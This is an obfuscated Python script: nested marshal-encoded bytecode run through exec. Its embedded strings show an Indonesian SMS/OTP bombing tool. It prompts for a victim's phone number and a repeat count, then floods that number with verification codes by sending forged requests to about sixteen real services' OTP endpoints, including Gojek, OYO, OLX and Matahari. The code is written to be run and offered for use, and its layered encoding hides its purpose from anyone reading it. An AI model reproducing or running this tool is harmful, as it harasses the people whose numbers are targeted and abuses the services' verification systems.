exec(marshal.loads(b'\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00NsF)\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\xbc(\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns2(\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\xa8\'\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x1e\'\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x94&\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\n&\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x80%\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x
01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\xf6$\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Nsl$\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\xe2#\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00@\x00\x00\x00s\xc8\x00\x00\x00d\x00d\x01l\x00Z\x01d\x00d\x01l\x02Z\x02d\x00d\x01l\x03Z\x03d\x00d\x01l\x04Z\x04d\x00d\x01l\x00Z\x00z\x0cd\x00d\x01l\x05Z\x05W\x00n\x16\x01\x00\x01\x00\x01\x00e\x03\xa0\x06d\x02\xa1\x01\x01\x00Y\x00n\x020\x00e\x01\xa0\x07\xa1\x00Z\x08e\x03\xa0\x06d\x03\xa1\x01\x01\x00e\x05\xa0\td\x04\xa1\x01Z\nd\x05Z\x0bd\x06Z\x0cd\x07Z\rd\x00Z\x0ed\x00Z\x0fG\x00d\x08d\t\x84\x00d\t\x83\x02Z\x10e\x11d\n\x83\x01\xa0\x06d\x03\xa1\x01\x01\x00d\x0bd\x0c\x84\x00Z\x12d\rd\x0e\x84\x00Z\x13d\x0fd\x10\x84\x00Z\x14e\x15d\x11k\x02r\xc4e\x14\x83\x00\x01\x00e\x13\x83\x00\x01\x00d\x01S\x00)\x12\xe9\x00\x00\x00\x00Nz\x14pip install pyfiglet\xda\x05clearz\x08Spam 
Smsz\x07\x1b[37;1mz\x07\x1b[32;1mz\x07\x1b[31;1mc\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00@\x00\x00\x00s\x1c\x00\x00\x00e\x00Z\x01d\x00Z\x02d\x01d\x02\x84\x00Z\x03d\x03d\x04\x84\x00Z\x04d\x05S\x00)\x06\xda\x06nyepamc\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x04\x00\x00\x00C\x00\x00\x00s\x1a\x00\x00\x00|\x01|\x02|\x03\x03\x00\x02\x00|\x00_\x00|\x00_\x01|\x00_\x02d\x00S\x00)\x01N)\x03\xda\x02_8\xda\x03_08\xda\x03_62)\x04\xda\x04selfr\x04\x00\x00\x00r\x05\x00\x00\x00r\x06\x00\x00\x00\xa9\x00r\x08\x00\x00\x00\xfa\n<kingtebe>\xda\x08__init__\x11\x00\x00\x00s\x02\x00\x00\x00\x00\x01z\x0fnyepam.__init__c\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x19\x00\x00\x00C\x00\x00\x00s\xe4\x05\x00\x00\x90\x05ztt\x00|\x01\x83\x01D\x00]4}\x02t\x01j\x02d\x01d\x02|\x00j\x03i\x01d\x03d\x04d\x05\x9c\x02d\x06\x8d\x03j\x04}\x03d\x07|\x03v\x00r<\x01\x00qBq\x0c\x01\x00qBq\x0ct\x00|\x01\x83\x01D\x00]d}\x02t\x01j\x02d\x08t\x05\xa0\x06d\td\n|\x00j\x07\x17\x00d\x0b\x9c\x02\xa1\x01d\x0cd\rd\x0ed\x0fd\x10d\x11d\x12d\x13d\x14d\x11d\x15d\x16d\x17d\x18d\x11d\x19d\x1ad\x1bd\x1cd\x1dd\x1e\x9c\x14d\x06\x8d\x03j\x04}\x03d\x1f|\x03v\x00r\xaa\x01\x00q\xb0qJ\x01\x00q\xb0qJt\x00|\x01\x83\x01D\x00]2}\x02t\x05\xa0\x08t\t\xa0\nd 
|\x00j\x07\x9b\x00\x9d\x02\xa1\x01j\x04\xa1\x01}\x03|\x03d!\x19\x00d"k\x02r\xe6q\xb8q\xb8\x01\x00q\xecq\xb8t\x00|\x01\x83\x01D\x00]H}\x02t\x01j\x02d#d\x02|\x00j\x03i\x01d$d\x03d%d&d\'d(d\x04d)d*d+d,d-\x9c\x0bd\x06\x8d\x03j\x04}\x03d.|\x03v\x00\x90\x01r6q\xf4q\xf4\x01\x00\x90\x01q>q\xf4t\x00|\x01\x83\x01D\x00]Z}\x02t\x01j\x02d/t\x05\xa0\x06|\x00j\x07d0d1d2d3d4d5\x9c\x06\xa1\x01d6d7d8d9d:d;d&d7d<d=d>\x9c\nd\x06\x8d\x03j\x04}\x03d?|\x03v\x00\x90\x01r\x98\x90\x01qFn\x06\x01\x00\x90\x01q\xa2\x90\x01qFt\x00|\x01\x83\x01D\x00]B}\x02t\x01j\x02d@d\ndA|\x00j\x03d\x11d\x11dBdC\x9c\x06dDdEi\x01d\x06\x8d\x03j\x04}\x03dF|\x03v\x00\x90\x01r\xe4\x90\x01q\xaan\x06\x01\x00\x90\x01q\xee\x90\x01q\xaat\x00|\x01\x83\x01D\x00]L}\x02t\x01j\x02dGt\x05\xa0\x06dHdI|\x00j\x0bd8dJ\x9c\x04\xa1\x01d&dKdLd\x04d;dM\x9c\x05d\x06\x8d\x03j\x04}\x03dN|\x03v\x00\x90\x02r:\x90\x01q\xf6n\x06\x01\x00\x90\x02qD\x90\x01q\xf6t\x00|\x01\x83\x01D\x00]B}\x02t\x01j\x02dOt\x05\xa0\x06|\x00j\x0bdPdQ\x9c\x02\xa1\x01d;d\x04dR\x9c\x02d\x06\x8d\x03j\x04}\x03d\x11|\x03v\x00\x90\x02r\x86\x90\x02qLn\x06\x01\x00\x90\x02q\x90\x90\x02qLt\x00|\x01\x83\x01D\x00]H}\x02t\x01j\x02dSd\x02|\x00j\x03i\x01dTdUd&dVd\x04d)dWdXdYdZ\x9c\td\x06\x8d\x03j\x04}\x03d[|\x03v\x00\x90\x02r\xd8\x90\x02q\x98n\x06\x01\x00\x90\x02q\xe2\x90\x02q\x98t\x00|\x01\x83\x01D\x00]8}\x02t\x01j\x02d\\d\x02|\x00j\x07i\x01dDd\x04i\x01d\x06\x8d\x03j\x04}\x03d]|\x03v\x00\x90\x03r\x1a\x90\x02q\xean\x06\x01\x00\x90\x03q$\x90\x02q\xeat\x00|\x01\x83\x01D\x00]D}\x02t\tj\nd^|\x00j\x03\x17\x00dDd\x04i\x01d_\x8d\x02}\x03t\x05\xa0\x08|\x03j\x04\xa1\x01}\x04|\x04d`\x19\x00dak\x02\x90\x03rh\x90\x03q,n\x06\x01\x00\x90\x03qr\x90\x03q,t\x00|\x01\x83\x01D\x00]X}\x02t\x01j\x02dbdcdd|\x00j\x0bd1de\x9c\x04dfdgdhdidjd;dkdldmdndodpd\x0edqdr\x9c\x0ed\x06\x8d\x03j\x04}\x03ds|\x03v\x00\x90\x03r\xca\x90\x03qzn\x06\x01\x00\x90\x03q\xd4\x90\x03qzt\x00|\x01\x83\x01D\x00]\\}\x02t\x01j\x02dtt\x05\xa0\x06du|\x00j\x0bdvdIdwdxdy\x9c\x05dz\x9c\x02\xa1\x01d&d{d;d|d}d~d\x7fd\x80d\x04d\x81\x9c\td\x0
6\x8d\x03j\x04}\x03d\x82|\x03v\x00\x90\x04r0\x90\x03q\xdcn\x06\x01\x00\x90\x04q:\x90\x03q\xdct\x00|\x01\x83\x01D\x00]J}\x02t\tj\nd\x83|\x00j\x07\x9b\x00d\x84\x9d\x03d\x85d\x86d\x87d\x17d\x88d\x89d\x13d\x0edqd\x8a\x9c\td_\x8d\x02j\x04}\x03d\x8b|\x03v\x00\x90\x04r\x84\x90\x04qBn\x06\x01\x00\x90\x04q\x8e\x90\x04qBt\x00|\x01\x83\x01D\x00]\x80}\x02t\t\xa0\nd\x8c\xa1\x01}\x05|\x05j\x0cd\x8d\x19\x00}\x06t\x01j\x02d\x8et\x05\xa0\x06d\x8fd\x90d\x91d\x92d0d\x17|\x00j\x03d\x11d\x93d\x94d\x95\x9c\ti\x01\xa1\x01d\x96d\x97d\x98d(d\x99d;d&d\x8cd+dYd\x9a|\x06\x9b\x00\x9d\x02d\x9b\x9c\x0bd\x06\x8d\x03j\x04}\x03d\x9c|\x03v\x00\x90\x05r\x0e\x90\x04q\x96n\x06\x01\x00\x90\x05q\x18\x90\x04q\x96t\x00|\x01\x83\x01D\x00]L}\x02t\x01j\x02d#d\x02|\x00j\x03i\x01d$d\x03d%d&d\'d(d\x04d)d*d+d,d-\x9c\x0bd\x06\x8d\x03j\x04}\x03d.|\x03v\x00\x90\x05rd\x90\x05q n\x06\x01\x00\x90\x05qn\x90\x05q t\r\x83\x00\x01\x00W\x00nh\x04\x00t\tj\x0ej\x0f\x90\x05y\x9c\x01\x00\x01\x00\x01\x00t\x10t\x11\x9b\x00d\x9d\x9d\x02\x83\x01\x01\x00Y\x00nD\x04\x00t\tj\x0ej\x12\x90\x05y\xc0\x01\x00\x01\x00\x01\x00t\x10t\x11\x9b\x00d\x9d\x9d\x02\x83\x01\x01\x00Y\x00n \x04\x00t\x13t\x14f\x02\x90\x05y\xde\x01\x00\x01\x00\x01\x00t\x10d\x9e\x83\x01\x01\x00Y\x00n\x020\x00d\x00S\x00)\x9fNz)https://cmsapi.mapclub.com/api/signup-otp\xda\x05phonez\nkeep-alivez\x9aMozilla/5.0 (Linux; Android 5.1.1; SM-G600S Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/59.0.3071.125 Mobile Safari/537.36)\x02\xda\nConnection\xfa\nUser-Agent)\x02\xda\x04data\xda\x07headers\xda\x02okz5https://api.adakami.id/adaKredit/pesan/kodeVerifikasir\x01\x00\x00\x00\xda\x010)\x02Z\x05ketikZ\x05nomorz\x1fapplication/json; 
charset=UTF-8Z\x0234Z\x04gzipz\x0cokhttp/3.8.0Z\x02in\xda\x00Z\x06800006Z\x07android\xda\x07defaultZ\x0cadtubeagencyZ\x0fAdakamiCampaign\xda\x011z\x051.7.0z\tSM-G935FDz\x057.1.1Z\x10a4341a2sa90a4d97z$c7bbb23d-a220-4d43-9caf-153608f9bd39z!1580054114839-7395423911531673296)\x14\xfa\x0ccontent-type\xfa\x0econtent-length\xfa\x0faccept-encoding\xfa\nuser-agent\xfa\x0faccept-languagez\x0bx-ada-tokenz\x0bx-ada-appidz\x08x-ada-osz\rx-ada-channelz\x11x-ada-mediasourcez\x0cx-ada-agencyz\x0ex-ada-campaignz\nx-ada-rolez\x10x-ada-appversionz\x0cx-ada-devicez\x0bx-ada-modelz\x0cx-ada-os-verz\x0fx-ada-androididz\tx-ada-aidz\nx-ada-afidzIPermintaan kode verifikasi sudah melebihi batas. Silakan coba lagi besok.z.https://id.jagreward.com/member/verify-mobile/\xda\x07messagezrAnda akan menerima sebuah panggilan dari sistem kami. Silakan isi 6 ANGKA TERAKHIR dari nomor telepon dibawah ini.z8https://tokomanamana.com/ma/auth/request_token_merchant/z\x10tokomanamana.comZ\x0218z\x03*/*z\x18https://tokomanamana.comZ\x0eXMLHttpRequestz0application/x-www-form-urlencoded; charset=UTF-8z$https://tokomanamana.com/ma/registerz\rgzip, deflatez\x11id-ID,en-US;q=0.8)\x0b\xda\x04Hostr\x0c\x00\x00\x00z\x0eContent-Length\xda\x06AcceptZ\x06Originz\x10X-Requested-Withr\x18\x00\x00\x00\xfa\x0cContent-TypeZ\x07Referer\xfa\x0fAccept-Encoding\xfa\x0fAccept-Languagez\x1aKode OTP berhasil dikirim!zUhttps://identity-gateway.oyorooms.com/identity/api/v1/otp/generate_by_phone?locale=idz\x03+62Z\x02ID\xda\x014\xda\x04trueZ\x0eConsumer_Guest)\x06r\x0b\x00\x00\x00Z\x0ccountry_codeZ\x10country_iso_codeZ\x03nodZ\x08send_otpZ\x0bdevise_rolez\x1didentity-gateway.oyorooms.comz\x18https://www.oyorooms.com\xda\x02idz8SFI4TER1WVRTakRUenYtalpLb0w6VnhrNGVLUVlBTE5TcUFVZFpBSnc=zyMozilla/5.0 (Linux; Android 10; SM-A107F) AppleWebKit/537.36 (KHTML,like Gecko) Chrome/83.0.4103.106 Mobile 
Safari/537.36z\x10application/jsonz\x1ehttps://www.oyorooms.com/loginz\x0fgzip,deflate,br)\nr\x1b\x00\x00\x00Z\rconsumer_hostr\x19\x00\x00\x00Z\x0caccess_tokenr\r\x00\x00\x00r\x1d\x00\x00\x00\xda\x06accept\xda\x06origin\xda\x07refererr\x1e\x00\x00\x00z\x1bSUCCESSFULLY GENERATED OTP z,https://app.cairin.id/v1/app/sms/sendCaptchaZ 6f8c3b90c845f09ff1bfe714a30aede8Z\x08registry)\x06Z\rhaveImageCodeZ\x08fileNamer\x0b\x00\x00\x00Z\timageCodeZ\x08userImei\xda\x04typer\x18\x00\x00\x00z\x9aMozilla/5.0 (Linux; Android 5.1.1; SM-J320M Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/86.0.4240.110 Mobile Safari/537.36Z\tleftTimesz+https://www.olx.co.id/api/auth/authenticateZ\x05retryZ\x03sms)\x04Z\tgrantType\xda\x06methodr\x0b\x00\x00\x00\xda\x08languagez\x18VQMGU1ZVDxABU1lbBgMDUlI=z.83b09e49653c37fb4dc38423d82d74d7#1597271158063)\x05r#\x00\x00\x00\xfa\rx-newrelic-idz\x16x-panamera-fingerprintr\x18\x00\x00\x00r\x15\x00\x00\x00Z\x06statuszOhttps://auth.dekoruma.com/api/v1/register/request-otp-phone-number/?format=jsonZ\x02wa)\x02Z\x0bphoneNumber\xda\x08platform)\x02r\x15\x00\x00\x00r\x18\x00\x00\x00z-https://api.payfazz.com/v2/phoneVerificationsz\x0fapi.payfazz.comZ\x0217z\x17https://www.payfazz.comz*http://www.payfazz.com/register/BEN6ZF74XLz\x11gzip, deflate, brz#id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7)\tr\x1b\x00\x00\x00r\x16\x00\x00\x00r#\x00\x00\x00r$\x00\x00\x00r\x18\x00\x00\x00r\x15\x00\x00\x00r%\x00\x00\x00r\x17\x00\x00\x00r\x19\x00\x00\x00Z\x13phoneVerificationIdz!https://harvestcakes.com/registerZ\x08functionz8https://api.danacita.co.id/users/send_otp/?mobile_phone=)\x01r\x0f\x00\x00\x00Z\x06detailz\x19Successfully sent OTP 
SMSz%https://api.gojekapi.com/v5/customersz\x1bnsjwwiwiwisnsnn12@gmail.comZ\x11akuinginterbang12)\x04Z\x05email\xda\x04namer\x0b\x00\x00\x00Z\x11signed_up_countryz$f8b67b26-c6a4-44d2-9d86-8d93a80901c9Z\x07AndroidZ\x108606f4e3b85968fdz\x063.52.2z\rcom.gojek.appZ\x06BearerZ\x08customerz\x05id-IDZ\x05id_IDz\x10api.gojekapi.comz\nKeep-Alivez\rokhttp/3.12.1)\x0ez\x0cX-Session-IDz\nX-Platformz\nX-UniqueIdz\x0cX-AppVersionz\x07X-AppIdr\x1c\x00\x00\x00Z\rAuthorizationz\x0bX-User-Typer\x1f\x00\x00\x00z\rX-User-Localer\x1b\x00\x00\x00r\x0c\x00\x00\x00r\x1e\x00\x00\x00r\r\x00\x00\x00Z\x07successz,https://u.icq.net/api/v14/rapi/auth/sendCodez\x1064708-1593781791z\x05en-USZ\x10ic1rtwz1s1Hj1O0rZ\x03icq)\x05r\x0b\x00\x00\x00r(\x00\x00\x00Z\x05routeZ\x05devIdZ\x0bapplication)\x02Z\x05reqIdZ\x06paramsz en-US,en;q=0.9,id;q=0.8,mt;q=0.7z\x12http://web.icq.comz\x13http://web.icq.com/\xda\x05emptyZ\x04corsz\ncross-site)\tr#\x00\x00\x00r\x19\x00\x00\x00r\x15\x00\x00\x00r$\x00\x00\x00r%\x00\x00\x00z\x0esec-fetch-destz\x0esec-fetch-modez\x0esec-fetch-siter\r\x00\x00\x00Z\x07resultsz?https://japi.maucash.id/welab-user/api/v1/send-sms-code?mobile=z\x0e&channelType=0z\x0fjapi.maucash.idz!application/json, text/plain, */*z\x0bgoogle playz\nYN-MAUCASHz\x062.4.23)\tr\x1b\x00\x00\x00r#\x00\x00\x00z\x08x-originz\x08x-org-idz\x0ex-product-codez\rx-app-versionz\x0bx-source-idr\x17\x00\x00\x00r\x18\x00\x00\x00z\x13Permintaan berhasilz1https://www.matahari.com/customer/account/create/Z\tPHPSESSIDz.https://www.matahari.com/rest/V1/thorCustomersZ\rthor_customerz\x0c Kang PacmanFz\x15aapafandi01@gmail.comZ\x15kontolanjingmemek6793z\n10/04/2000)\tr+\x00\x00\x00Z\x0bcard_numberZ\remail_addressZ\x13mobile_country_codeZ\tgender_idZ\rmobile_number\xda\x03mroZ\x08passwordZ\nbirth_datez\x10www.matahari.comZ\x03245z\x18Vg4GVFVXDxAGVVlVBgcGVlY=z\x9aMozilla/5.0 (Linux; Android 8.1.0; SM-J111F Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/87.0.4280.141 Mobile 
Safari/537.36z\nPHPSESSID=)\x0br\x1b\x00\x00\x00r\x16\x00\x00\x00r)\x00\x00\x00z\x10x-requested-withr\x18\x00\x00\x00r\x15\x00\x00\x00r#\x00\x00\x00r%\x00\x00\x00r\x17\x00\x00\x00r\x19\x00\x00\x00Z\x06cookieZ\x07Successz\x1a[!] Kesalahan Pada Koneksi\xfa\x08[!] Exit)\x15\xda\x05range\xda\x03reqZ\x04postr\x05\x00\x00\x00\xda\x04text\xda\x04json\xda\x05dumpsr\x04\x00\x00\x00\xda\x05loads\xda\x04reek\xda\x03getr\x06\x00\x00\x00Z\x07cookies\xda\x07bingungZ\nexceptionsZ\x0bReadTimeout\xda\x04exit\xda\x01m\xda\x0fConnectionError\xda\x11KeyboardInterrupt\xda\x08EOFError)\x07r\x07\x00\x00\x00\xda\x03asu\xda\x01x\xda\x04send\xda\x04load\xda\x01a\xda\x01br\x08\x00\x00\x00r\x08\x00\x00\x00r\t\x00\x00\x00\xda\x05mulai\x13\x00\x00\x00s\x90\x00\x00\x00\x00\x01\x04\x01\x0c\x01\x1e\x01\x0e\x01\x06\x01\x0c\x01N\x01\x0e\x01\x06\x01\x0c\x01\x1a\x01\x10\x01\x06\x01\x0c\x010\x01\x0e\x01\x08\x01\x0c\x01>\x01\x10\x01\n\x01\x0c\x01&\x01\x10\x01\n\x01\x0c\x010\x01\x10\x01\n\x01\x0c\x01&\x01\x10\x01\n\x01\x0c\x01,\x01\x10\x01\n\x01\x0c\x01\x1c\x01\x10\x01\n\x01\x0c\x01\x18\x01\x0c\x01\x14\x01\n\x01\x0c\x01<\x01\x10\x01\n\x01\x0c\x01@\x01\x10\x01\n\x01\x0c\x01.\x01\x10\x01\n\x01\x0c\x01\n\x01\n\x01P\x01\x10\x01\n\x01\x0c\x010\x01\x10\x01\n\x01\n\x01$\x01$\x01z\x0cnyepam.mulaiN)\x05\xda\x08__name__\xda\n__module__\xda\x0c__qualname__r\n\x00\x00\x00rC\x00\x00\x00r\x08\x00\x00\x00r\x08\x00\x00\x00r\x08\x00\x00\x00r\t\x00\x00\x00r\x03\x00\x00\x00\x10\x00\x00\x00s\x04\x00\x00\x00\x08\x01\x08\x02r\x03\x00\x00\x00\xda\x02osc\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00sX\x00\x00\x00t\x00t\x01\x9b\x00d\x01t\x02\x9b\x00d\x02\x9d\x04\x83\x01\x01\x00t\x00d\x03\x83\x01\x01\x00t\x03d\x04\x83\x01}\x00|\x00d\x05k\x02r4t\x04\x83\x00\x01\x00n |\x00d\x06k\x02rFt\x05d\x07\x83\x01\x01\x00n\x0et\x00d\x08\x83\x01\x01\x00t\x06\x83\x00\x01\x00d\x00S\x00)\tNu#\x00\x00\x00\n[\xe2\x88\x9a] Semua Spam Terkirim Berhasil\xda\x01\nz6Ingin Spam Lagi?\nKetik y untuk ya ketik t 
untuk tidak\nz\x06y/t : \xda\x01y\xda\x01tz\rTerima Kasih!z\x13Masukan Yang Benar!)\x07\xda\x05print\xda\x01h\xda\x01p\xda\x05input\xda\x03cokZ\x05exiter7\x00\x00\x00)\x01Z\x05pilihr\x08\x00\x00\x00r\x08\x00\x00\x00r\t\x00\x00\x00r7\x00\x00\x00]\x00\x00\x00s\x12\x00\x00\x00\x00\x01\x14\x01\x08\x01\x08\x01\x08\x01\x08\x01\x08\x01\n\x02\x08\x01r7\x00\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\n\x00\x00\x00C\x00\x00\x00s$\x01\x00\x00z\xcet\x00d\x01\x83\x01}\x00|\x00d\x02d\x03\x85\x02\x19\x00}\x01|\x00d\x04v\x00r(t\x01d\x05\x83\x01\x01\x00n\xa4d\x06|\x01v\x01r:t\x01d\x07\x83\x01\x01\x00n\x92t\x02|\x00\x83\x01d\x08k\x01rPt\x01d\t\x83\x01\x01\x00n||\x00d\nk\x02rbt\x01d\x0b\x83\x01\x01\x00njz\x10t\x03t\x00d\x0c\x83\x01\x83\x01}\x02W\x00n\x1a\x01\x00\x01\x00\x01\x00t\x01d\r\x83\x01\x01\x00t\x04\x83\x00\x01\x00Y\x00n\x020\x00t\x05\xa0\x06d\x03\xa1\x01\x01\x00t\x01d\x0e\x83\x01\x01\x00|\x00d\x0fd\x10\x85\x02\x19\x00}\x03d\x11|\x03\x17\x00}\x04t\x07|\x03|\x00|\x04\x83\x03\xa0\x08|\x02\xa1\x01\x01\x00W\x00\x90\x01q W\x00q\x00\x04\x00t\ty\xfe\x01\x00}\x05\x01\x00z\x18t\nt\x0b|\x05\x83\x01\x83\x01\x01\x00W\x00Y\x00d\x00}\x05~\x05q\x00d\x00}\x05~\x050\x00\x04\x00t\x0ct\rf\x02\x90\x01y\x1c\x01\x00\x01\x00\x01\x00t\nd\x12\x83\x01\x01\x00Y\x00q\x000\x00q\x00d\x00S\x00)\x13Nu\x1c\x00\x00\x00[+] Nomer Korban 08\xc3\x97\xc3\x97\xc3\x97\t: r\x01\x00\x00\x00\xe9\x02\x00\x00\x00)\x02r\x12\x00\x00\x00\xfa\x01 z\x15[!] Jangan Kosong AjgZ\x0208z\x18[!] Gunakan Nomer 08xxx\n\xe9\n\x00\x00\x00z#[!] Nomer Harus Lebih Dari 10 AngkaZ\x0c081368646011z3[!] 
Anda Tidak Bisa Spam Yang Punya Script Goblok!\nz\x1a[+] Masukan Jumlah Spam\t: z"Masukan Format Angka Jangan Huruf!z\x17\n[+] Sedang Menyepam...\xe9\x01\x00\x00\x00\xe9\x0c\x00\x00\x00Z\x0262r.\x00\x00\x00)\x0erN\x00\x00\x00rK\x00\x00\x00\xda\x03len\xda\x03intrO\x00\x00\x00\xda\x04time\xda\x05sleepr\x03\x00\x00\x00rC\x00\x00\x00\xda\tExceptionr8\x00\x00\x00\xda\x03strr;\x00\x00\x00r<\x00\x00\x00)\x06rA\x00\x00\x00r=\x00\x00\x00Z\x03suurB\x00\x00\x00\xda\x01cZ\x02exr\x08\x00\x00\x00r\x08\x00\x00\x00r\t\x00\x00\x00rO\x00\x00\x00h\x00\x00\x00s(\x00\x00\x00\x00\x02\x02\x01\x08\x01\x0c\x01\x12\x01\x12\x01\x16\x01\x12\x02\x02\x01\x10\x01\x06\x01\x08\x01\x0c\x01\n\x01\x08\x01\x0c\x01\x08\x01\x12\x01\n\x01.\x01rO\x00\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s"\x00\x00\x00t\x00t\x01\x9b\x00t\x02\x17\x00t\x03\x9b\x00d\x01t\x01\x9b\x00d\x02\x9d\x04\x17\x00\x83\x01\x01\x00d\x00S\x00)\x03Nz(\nFOLLOW IG @anker_2412 | 16 Operator Otpzr\n\nJangan Disalah Gunakan Anjg\nJumlah Spam Dikalikan Dengan 16\nContoh Jumlah Spam 2\nJadinya 2 Dikali 16 Spamnya 
32\n)\x04rK\x00\x00\x00rM\x00\x00\x00\xda\x05titlerL\x00\x00\x00r\x08\x00\x00\x00r\x08\x00\x00\x00r\x08\x00\x00\x00r\t\x00\x00\x00\xda\x05memek\x7f\x00\x00\x00s\x02\x00\x00\x00\x00\x01r]\x00\x00\x00\xda\x08__main__)\x16Z\x08requestsr5\x00\x00\x00r2\x00\x00\x00rG\x00\x00\x00rW\x00\x00\x00Z\x08pyfiglet\xda\x06systemZ\x07Sessionr0\x00\x00\x00Z\rfiglet_formatr\\\x00\x00\x00rM\x00\x00\x00rL\x00\x00\x00r9\x00\x00\x00Z\x03berZ\x03gagr\x03\x00\x00\x00\xda\n__import__r7\x00\x00\x00rO\x00\x00\x00r]\x00\x00\x00rD\x00\x00\x00r\x08\x00\x00\x00r\x08\x00\x00\x00r\x08\x00\x00\x00r\t\x00\x00\x00\xda\x08<module>\x03\x00\x00\x00s(\x00\x00\x00(\x01\x02\x01\x0c\x01\x06\x01\x10\x01\x08\x01\n\x01\n\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x0eL\x0e\x01\x08\x0b\x08\x17\x08\x02\x08\x01\x06\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\n<kingtebe>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\n<kingtebe>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\n<kingtebe>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\n<kingtebe>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\n<kingtebe>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07mar